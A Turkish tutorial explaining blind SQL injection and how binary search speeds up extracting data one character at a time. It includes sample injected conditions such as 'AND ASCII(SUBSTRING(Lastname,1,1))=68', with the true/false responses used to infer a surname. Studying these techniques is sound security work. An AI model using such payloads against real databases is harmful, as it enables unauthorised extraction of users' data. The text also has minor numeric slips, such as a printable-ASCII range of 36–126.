Bir çoğumuz SQL cümlecikleri kullanarak veritabanlarımızda listeleme, güncelleme ve ekleme işlemleri yaparız. Fakat bu kullandığımız SQL cümleciklerinin ne tür sıkıntılar doğurabileceğinin üzerinde pek durmayız. Bir yazılımcı için önemli olan tüm kullanıcı listesini çekmek ise “SELECT * FROM users” yazmaktır. Belli bir numaraya sahip bir kullanıcı çekmek için ise “SELECT * FROM users WHERE UserID=101” yazmak yetecektir. Fakat kullandığımız programlama teknikleri bir kullanıcının bilgilerini çekmek için yazılan SQL cümleciğini çok tehlikeli durumlara sokabilir. Bu aslında bazen kullanılan dilin, bazen de yazılımcının tekniğinin sonucudur. Yine de ucu açık bir tartışma konusu diyebiliriz.

SQL Injection için söylenecekler çok fazla olsa da temel de problemin ortaya çıkış nedeni; cümleciğin herhangi bir yerine eklenen kod parçacıklarıyla farkedilir. Örneğin; “ ` ”  gönderip, sonucunun hata dönmesi gibi. Tabi bazen bu hata çıktılarıda işimizi görmeyebilir veya hata dönmeyebilir.  Blind hem SQL Injection açığını barındırmasıyla birlikte sonucun her zaman true/false dönmesiyle ilgilenir. Aslında bu açıklığın ciddi bir problem oluşturması temel bir matematik probleminin varlığıyla meydana gelmektedir.

Blind SQL Injection için örnek;

   Sorgu1:  SELECT Username FROM users WHERE userid=1
   Cevap : Fantastik

   Sorgu2: SELECT Username FROM users WHERE userid=121
   Cevap :

Görüldüğü gibi database de userid=1 de bir kullanıcı var, userid=121 de ise kullanıcı yok. Burda yapılan bir tane “true” değeri yakalayabilmek. Sorgu1 ile bu sağlanmış oldu. Bundan sonra yapılması gereken, görülen cevaba bakılarak sorgu üzerinde oynamalar yapmak. Her değişikliğimizde geri dönen cevap, yaptıklarımızla doğru yolda olup olmadığımızı söyleyecektir. Sorgu1`i biraz değiştirecek olursak;

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,1,1))=97
   Cevap :

Userid=1 için kullanıcının soyisminin ilk harfi “a” mıdır? Görüldüğü gibi bizim daha önce elde ettiğimiz içerik gelmedi. Biz her sorgumuz da bu içeriğin aynısının gelip gelmediğine bakıyoruz (Yukarıda cevabın true/false dönmesi ile farkedilir dediğimiz kısım).

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,1,1))=98
   Cevap :

Userid=1 için kullanıcının soyisminin ilk harfi “b” midir?

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,1,1))=68
   Cevap : Fantastik

Userid=1 için kullanıcının soyisminin ilk harfi “D” olarak karşımıza çıktı. Çünkü lastname`ni ilk karakterinin ASCII değeri 68. Bu da “D” harfine denk gelmektedir. Bu sorgumuzla birlikte daha önce görmüş olduğumuz içeriği (true) elde ederek farkettik.

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,2,1))=69
   Cevap :

Userid=1 için kullanıcının soyisminin ikinci harfi “E” midir?

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,2,1))=101
   Cevap : Fantastik

Userid=1 kullanıcısının soyisminin ikinci harfi “e” dir.

Buraya kadar Blind SQL Injection açığının ne olduğunu temel olarak görmüş olduk. Fakat tablo isimleri, tabloların alan adları, içindeki verileri böyle teker teker deneyerek bulmak nekadar zamanımızı alır? Muhtemelen a-z,A-Z ve 0-9 arasına bir de “?,-,+,* v.s” gibi karakterlerin de varlığını hesaba katarsak. Substring ile elde ettiğimiz tek karakteri deneyerek bulmak, bulanık bir zaman dilime gelecekti ki bu da elle imkansıza yakın. Tabi çok büyük verilerin bu şekilde alınmasından bahsediyoruz.

Şimdi ise bu problemi gerçekten kritik bir problem haline getiren matematiksel alt yapıyı ele alalım.

Algoritma Analizi ve Karmaşıklık

Aslında bir algoritmayı neden analiz etmek isteriz? Performansı ölçmek için, farklı algoritmalarla karşılaştırabilmek için, daha iyisi mümkün mü? Bir algoritmanın özelliklerini analiz ederken de çalışma zamanı ve hafıza da kapladığı alana bakarız. Tabi bu maddeleri çoğaltmak mümkün. Fakat genel kabul bir algoritmanın karmaşıklığı; çalışma hızı ve hafıza da kapladığı alanla belirlenir.  Biz şu an “zaman” problemi üzerinde duracağız. Çünkü Blind SQL Injection da gördüğümüz gibi teker teker deneme yoluyla bilgi toplamak gerçekten çok zor. Ancak bu deneme zaman aralığını (deneme sayısını) kısaltırsak bu problemi kullanışlı hale getirebiliriz. Zaman karmaşıklığı Büyük-O notasyonu ile gösterilir.

İkili Arama (Binary Search)

Problem çözümlerinde böl ve yönet prensibine dayanır. Çözüm süresini genelde ½ oranında bölerek zaman aralığını kısaltmayı hedefler. Bu algoritma da dikkat edilmesi gereken bir husus ise elemanların artan veya azalan şekilde sıralı olmasıdır. Arama işlemi ilk bölünmede sonuçlanmıyorsa tekrar alt kümeler de bölünerek arama işlemi devam eder. İkili arama algoritması için zaman karmaşıklığı O(logN)`dir.

Örnek verecek olursak;

Sayı olduğunu bildiğimiz bir alan da “2” sayısına ulaşabilmek için 0,1,2,3,4,5,6,7,8,9 u sırayla denesek 3. deneme de bulacaktık. Fakat bu tamamen şansımızla alakalıydı. Eğer aynı durum da “7” için bir arama yapıyor olsaydık bu sefer 8. Deneme de bu sayıyı bulacaktık. Fakat ikili arama lagoritması ile önce 5`den büyük veya küçük olduğuna bakılır. Küçükse soldan, büyükse sağdan devam edilir. Eşit ise durulur.

7 için;

7=5 (false)
7>5 (true)
7=7 (true)

3. denemede eşitliği yakaladık.

ASCII karakterler yardımıyla denemelerimizi yapmıştık. ASCII okunabilir karakterler 36-126 arasındadır.

   • f(n) = ?(log n)
   • f(126-32) = ?(log (126-32))?
   • ~7 karşılaştırmada karakterin doğruluğuna erişilir.

Yani bu aradaki tüm karakterler için en fazla 7 deneme yapmamız yeterlidir. Oysa 126-32=94 defa deneme yapmaktan kurtulmuş oluyoruz. Tabi bu her bir karakter için 94 defa bakılacak anlamına gelmez. Şansınız iyiyse bu sayı daha da küçülebilir. Fakat aynı durum ~7 için de geçerlidir.

Bu sayede bir karakter için harcamamız gereken maksimum deneme 7 olarak belirlemiş olduk. Peki deneme yapacağımız karakter sayısı çok fazla ise? Bu sefer deneme yapılan kümeyi biraz daha azaltabiliriz. Yukarıda örnekler de görüldüğü gibi “E” ve “e” harfleri bir birinden farklı olarak algılanmıştı. Eğer A-Z arasındaki büyük harfleri atar ve kontrol etmek istediğimiz karakteri lowercase`den geçirirsek?

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(SUBSTRING(Lastname,1,1))=68
   Cevap : Fantastik

Bu sefer “D” harfi yerine “d” yi kontrol ederek

   Sorgu1:  SELECT Username FROM users WHERE userid=1 AND ASCII(LOWER(SUBSTRING(Lastname,1,1)))=100
   Cevap : FAntastik

Aynı sonuca erişebiliriz. Bu sayede deneme yapacağımız kümeyi ~6 indirebiliriz.

Bu sayede  en fazla 94 deneme yerine en fazla 6 deneme de istediimiz bilgiye erişme olanağı ortaya çıkmış oldu.

Özetle; binary search algoritmasının varlığı Blind Sql Injection`u daha tehlikeli hala sokuyor. Eğer bu şekilde bir algoritma olmasaydı bu açıklığın kullanılabilir olması pek mümkün olmayacaktı.

Kaynaklar

1) http://www.owasp.org/index.php/Blind_SQL_Injection
2) http://sqlmap.sourceforge.net/
3) http://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)

günümüzün asla tükenmiycek olan açıgı ;)